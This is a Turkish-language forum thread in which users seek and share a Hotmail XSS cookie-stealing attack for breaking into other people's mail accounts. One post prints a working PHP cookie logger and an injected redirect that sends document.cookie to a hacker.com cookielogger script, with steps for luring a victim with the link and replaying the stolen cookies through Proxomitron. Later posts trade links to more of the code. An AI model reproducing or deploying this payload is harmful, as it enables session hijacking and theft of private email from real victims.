Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Skype - Mirc - Irc - Icq - Mail Güvenliği 
Hotmail Xss Olayını Anlatacak Biri Yokmu? Hotmail Xss Olayını Anlatacak Biri Yokmu?
-
hertarafta yazıldığı gibi hotmailde xss olayı ile mailler okunup alınabilmektedir.
yine hertarafta yazıldığı gibi programlada çalınan cokieleri kullanarak hasaba erişebiliyoruz
bunun kodları kimde var? nereden bulunur? bilen yokmu? -
Ne olduğunu bende araştırıyorum bulabildiğim en iyi kaynak http://www.net-force.nl/files/articles/hotmail_xss/ ;) ama ingilizce.. ;)
-
o zaman türkçeye çevirebilecek olan yokmu :P
yaa herkes biliyo olay patlamadan hotmail kapatmadan gezelim görelim öğrenelim falan yanii -
iyi yaklaşıyorsun devam et araştırmaya :))
-
hotmail açık kodlarını kendi sitemize uploadlıyoruz ??
ve bazı kodlar var :D
o linki kurbana yolluyoruz
kendi sitemizde başka klasöre cokieler kaydoluyor
Proxomitron isimli programa ayarlamaları yapıyoruz
birde boyle bir adresimiz var
http://by12fd.bay12.hotmail.msn.com/cgi-bin/hmhome?fti=yes
kodlarda bunlar
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Error: Unable to write to the log file";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Error while writing to log file";
exit;
}
}
echo "Successfully wrote a string to the log file";
fclose($handle);
exit;
}
echo "nothing to write to the log file";
exit;
?>
header("Location: http://ilovemessenger.msn.com/?mkt=nl-nl');location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie);escape('");
exit;
?>
elimizde bunlar var
eee kim derleyip anlatacak bana bize pm ile gönderin bari yaww tabi bilen varsa bilmeyipte atan olursa mailini alırım :Dhehe
-
kodların gözükmediğini unutmuştum çok çok pardonnn
elimizdeki kodlarda bunlar
http://www.hemenpaylas.com/download/1342243/hotmail.txt.html
-
Hotmail XSS açığı benim için bir hazinedir : )))
Sanmıyorum kimse dağıtsın, açık dağıldığında boku çıkacaktır. Fake gibi elden ele dolaşacak ve açığı hotmail keşfedip kapatacak..
Herkez bunları düşündüğünden dağıtmaz.
http://www.net-force.nl/files/articles/hotmail_xss/ => burdaki anlatımda eski kapanmıştır bilginize :D
PM İle açığın nasıl kullanıldığını sormayın hiç bilgi veremem anlattığıım nedenlerden dolayı.. -
ee yani paylaşım? bu arada hotmail bu açığı kapatmak için çalışmalar yapıyormuş zaten yakında patlayacak bilginize.. :D ama patlamadan çalışmalara devam :D
-
Neden biliyon la kaynak filan varmı ? :S
-
biyerden okudum şimdi hatırlamıyom yaff
şimdi bununla yapılmış bir site işte gelen uzantı ben tıkladım bişe gözükmedi sora hotmail ana sayfası açıldı inşallah mailim gitmez
http://www.ikinciogretim.com/site -
genel olarak msn live geciş yapanları böle hacklemek biraz daha zorlaşıo.
livede bu acııı msn biraz daha kapatıomuş
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Toplam Hit: 17602 Toplam Mesaj: 43
Cevapla